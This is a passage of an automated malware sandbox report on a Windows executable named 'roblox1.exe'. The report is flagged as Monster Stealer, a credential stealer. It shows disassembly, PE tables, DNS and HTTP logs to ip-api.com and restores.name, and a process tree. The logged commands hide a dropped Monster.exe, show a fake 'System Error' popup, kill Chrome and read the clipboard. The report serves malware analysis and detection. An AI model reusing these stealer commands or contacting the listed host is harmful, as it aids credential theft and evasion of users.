mov eax, dword ptr [ebp-28h]
dec eax
mov eax, dword ptr [eax+08h]
dec eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-04h], 00000000h
jmp 00007F06692E2FF3h
dec eax
mov eax, dword ptr [ebp-10h]
dec eax
cmp eax, dword ptr [ebp-18h]
jne 00007F06692E2FDBh
mov dword ptr [ebp-04h], 00000001h
jmp 00007F06692E3017h
mov ecx, 000003E8h
dec eax
mov eax, dword ptr [000472FEh]
call eax
dec eax
mov eax, dword ptr [0001E95Dh]
dec eax
mov dword ptr [ebp-30h], eax
dec eax
mov eax, dword ptr [ebp-18h]
dec eax
mov dword ptr [ebp-38h], eax
dec eax
mov dword ptr [ebp-40h], 00000000h
dec eax
mov ecx, dword ptr [ebp-38h]
dec eax
mov eax, dword ptr [ebp-40h]
dec eax
mov edx, dword ptr [ebp-30h]
dec eax
cmpxchg dword ptr [edx], ecx
dec eax
mov dword ptr [ebp-10h], eax
dec eax
cmp dword ptr [ebp-10h], 00000000h
jne 00007F06692E2F7Ah
dec eax
mov eax, dword ptr [0001E936h]
mov eax, dword ptr [eax]
Data directories:
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x48000 | 0xe14 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4b000 | 0xa853d0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x22000 | 0x7c8 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xad1000 | 0x90 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x1f360 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x48368 | 0x318 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1b828 | 0x1ba00 | 1455bf91ae500609df54dc39473cd02c | False | 0.5004153704751131 | data | 6.3279571847761 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x1d000 | 0x100 | 0x200 | eb9a6cb228491de89417dc68d3c3e465 | False | 0.173828125 | data | 1.1472281521632943 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x1e000 | 0x2ab0 | 0x2c00 | 06ba628f277d0fbdce9d69acb88071d4 | False | 0.27494673295454547 | data | 5.143379586263529 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.eh_fram | 0x21000 | 0x4 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x22000 | 0x7c8 | 0x800 | 264a8f496e19cc8aa452042d9082d892 | False | 0.4990234375 | data | 5.135211167390138 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata | 0x23000 | 0x970 | 0xa00 | 7b4256fb41288066fee448ce27d14d87 | False | 0.276171875 | shared library | 4.49993989238553 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss | 0x24000 | 0x23c90 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x48000 | 0xe14 | 0x1000 | b67a6c2d0d3709103b2f787b6c1f601a | False | 0.31201171875 | data | 4.089062374830754 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT | 0x49000 | 0x60 | 0x200 | 78ac47b49507f3b1f9fdfe0f61a65ad6 | False | 0.0703125 | data | 0.3164000245953951 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x4a000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4b000 | 0xa853d0 | 0xa85400 | 102123431f9b35cda8ef1ad8d0c6f7a3 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xad1000 | 0x90 | 0x200 | 817e154368d240e8615462a76de66e30 | False | 0.279296875 | data | 1.7625445577197119 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_RCDATA | 0x4b0a0 | 0xa84f38 | data | | | 1.0003108978271484
RT_MANIFEST | 0xacffd8 | 0x3f8 | ASCII text, with very long lines (1016), with no line terminators | | | 0.4655511811023622
DLL | Import
KERNEL32.dll | CloseHandle, CopyFileW, CreateDirectoryW, CreateFileMappingW, CreateFileW, CreateProcessW, DeleteCriticalSection, DeleteFileW, EnterCriticalSection, FindResourceA, FormatMessageA, FreeLibrary, GenerateConsoleCtrlEvent, GetCommandLineW, GetCurrentProcessId, GetEnvironmentVariableW, GetExitCodeProcess, GetFileAttributesW, GetFileSize, GetLastError, GetModuleFileNameW, GetModuleHandleA, GetProcAddress, GetProcessId, GetStdHandle, GetSystemTimeAsFileTime, GetTempPathW, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, LoadResource, LockResource, MapViewOfFile, MultiByteToWideChar, ReadFile, SetConsoleCtrlHandler, SetEnvironmentVariableW, SetUnhandledExceptionFilter, SizeofResource, Sleep, TerminateProcess, TlsGetValue, UnmapViewOfFile, VirtualProtect, VirtualQuery, WaitForSingleObject, WideCharToMultiByte, WriteFile
msvcrt.dll | __C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __iob_func, __set_app_type, __setusermatherr, __wargv, __wgetmainargs, __winitenv, _amsg_exit, _cexit, _commode, _errno, _fmode, _initterm, _lock, _onexit, _unlock, _wcsdup, _wcsicmp, _wrename, abort, calloc, exit, fprintf, fputc, free, fwrite, localeconv, malloc, mbstowcs, memcpy, memmove, memset, puts, signal, strerror, strlen, strncmp, vfprintf, wcschr, wcscmp, wcslen, wcsncmp
SHELL32.dll | CommandLineToArgvW, SHFileOperationW, SHGetFolderPathW
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 15:08:33.092458963 CET | 49712 | 80 | 192.168.2.8 | 208.95.112.1
Dec 18, 2024 15:08:33.213346004 CET | 80 | 49712 | 208.95.112.1 | 192.168.2.8
Dec 18, 2024 15:08:33.213521004 CET | 49712 | 80 | 192.168.2.8 | 208.95.112.1
Dec 18, 2024 15:08:33.214473963 CET | 49712 | 80 | 192.168.2.8 | 208.95.112.1
Dec 18, 2024 15:08:33.334125996 CET | 80 | 49712 | 208.95.112.1 | 192.168.2.8
Dec 18, 2024 15:08:34.310555935 CET | 80 | 49712 | 208.95.112.1 | 192.168.2.8
Dec 18, 2024 15:08:34.311791897 CET | 49712 | 80 | 192.168.2.8 | 208.95.112.1
Dec 18, 2024 15:08:34.431794882 CET | 80 | 49712 | 208.95.112.1 | 192.168.2.8
Dec 18, 2024 15:08:34.431899071 CET | 49712 | 80 | 192.168.2.8 | 208.95.112.1
Dec 18, 2024 15:09:03.678731918 CET | 49722 | 443 | 192.168.2.8 | 135.181.65.219
Dec 18, 2024 15:09:03.678776026 CET | 443 | 49722 | 135.181.65.219 | 192.168.2.8
Dec 18, 2024 15:09:03.678895950 CET | 49722 | 443 | 192.168.2.8 | 135.181.65.219
Dec 18, 2024 15:09:03.680464983 CET | 49722 | 443 | 192.168.2.8 | 135.181.65.219
Dec 18, 2024 15:09:03.680479050 CET | 443 | 49722 | 135.181.65.219 | 192.168.2.8
Dec 18, 2024 15:09:05.117233038 CET | 443 | 49722 | 135.181.65.219 | 192.168.2.8
Dec 18, 2024 15:09:05.118222952 CET | 49722 | 443 | 192.168.2.8 | 135.181.65.219
Dec 18, 2024 15:09:05.118240118 CET | 443 | 49722 | 135.181.65.219 | 192.168.2.8
Dec 18, 2024 15:09:05.119333029 CET | 443 | 49722 | 135.181.65.219 | 192.168.2.8
Dec 18, 2024 15:09:05.119393110 CET | 49722 | 443 | 192.168.2.8 | 135.181.65.219
Dec 18, 2024 15:09:05.120485067 CET | 49722 | 443 | 192.168.2.8 | 135.181.65.219
Dec 18, 2024 15:09:05.120520115 CET | 443 | 49722 | 135.181.65.219 | 192.168.2.8
Dec 18, 2024 15:09:05.120637894 CET | 49722 | 443 | 192.168.2.8 | 135.181.65.219
Dec 18, 2024 15:09:05.120640993 CET | 443 | 49722 | 135.181.65.219 | 192.168.2.8
Dec 18, 2024 15:09:05.120718002 CET | 49722 | 443 | 192.168.2.8 | 135.181.65.219
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 15:08:32.883950949 CET | 49378 | 53 | 192.168.2.8 | 1.1.1.1
Dec 18, 2024 15:08:33.021668911 CET | 53 | 49378 | 1.1.1.1 | 192.168.2.8
Dec 18, 2024 15:09:03.538799047 CET | 50158 | 53 | 192.168.2.8 | 1.1.1.1
Dec 18, 2024 15:09:03.676676989 CET | 53 | 50158 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 18, 2024 15:08:32.883950949 CET | 192.168.2.8 | 1.1.1.1 | 0xf38c | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:09:03.538799047 CET | 192.168.2.8 | 1.1.1.1 | 0xa00c | Standard query (0) | restores.name | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 18, 2024 15:08:33.021668911 CET | 1.1.1.1 | 192.168.2.8 | 0xf38c | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:09:03.676676989 CET | 1.1.1.1 | 192.168.2.8 | 0xa00c | No error (0) | restores.name | | 135.181.65.219 | A (IP address) | IN (0x0001) | false
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49712 | 208.95.112.1 | 80 | 3428 | C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
Timestamp | Bytes transferred | Direction | Data
Dec 18, 2024 15:08:33.214473963 CET | 125 | OUT | GET /json HTTP/1.1
Host: ip-api.com
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Python/3.10 aiohttp/3.10.5
Dec 18, 2024 15:08:34.310555935 CET | 483 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 14:08:34 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 306
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


Target ID: 0
Start time: 09:08:21
Start date: 18/12/2024
Path: C:\Users\user\Desktop\roblox1.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\roblox1.exe"
Imagebase: 0x7ff7ac5f0000
File size: 11'168'256 bytes
MD5 hash: CD463D16CF57C3A9F5C9588A878A7213
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MonsterStealer, Description: Yara detected Monster Stealer, Source: 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 2
Start time: 09:08:22
Start date: 18/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                  Start time:09:08:25
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  Imagebase:0x7ff7cfbb0000
                                                                                                                                                                                                                                  File size:16'927'744 bytes
                                                                                                                                                                                                                                  MD5 hash:6FE46FD6E5B143F5114E6616C59B703C
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_MonsterStealer, Description: Yara detected Monster Stealer, Source: 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000003.00000002.1951447889.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_MonsterStealer, Description: Yara detected Monster Stealer, Source: 00000003.00000002.1951447889.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1951447889.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_MonsterStealer, Description: Yara detected Monster Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, Author: Joe Security
                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                  • Detection: 71%, ReversingLabs
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                  Start time:09:08:26
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                  Start time:09:08:27
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                  Start time:09:08:27
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                  Start time:09:08:27
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                  Imagebase:0x7ff6850e0000
                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                  Start time:09:08:27
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:tasklist
                                                                                                                                                                                                                                  Imagebase:0x7ff759970000
                                                                                                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                  Start time:09:08:30
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe""
                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                  Start time:09:08:30
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:attrib +h +s "C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe"
                                                                                                                                                                                                                                  Imagebase:0x7ff715ae0000
                                                                                                                                                                                                                                  File size:23'040 bytes
                                                                                                                                                                                                                                  MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                  Start time:09:08:30
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                  Start time:09:08:30
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                  Start time:09:08:31
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
                                                                                                                                                                                                                                  Imagebase:0x7ff6875b0000
                                                                                                                                                                                                                                  File size:14'848 bytes
                                                                                                                                                                                                                                  MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                  Start time:09:08:31
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:taskkill /F /IM chrome.exe
                                                                                                                                                                                                                                  Imagebase:0x7ff6b9050000
                                                                                                                                                                                                                                  File size:101'376 bytes
                                                                                                                                                                                                                                  MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                                                  Start time:09:08:40
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                                                  Start time:09:08:40
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                  Start time:09:08:40
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "chcp"
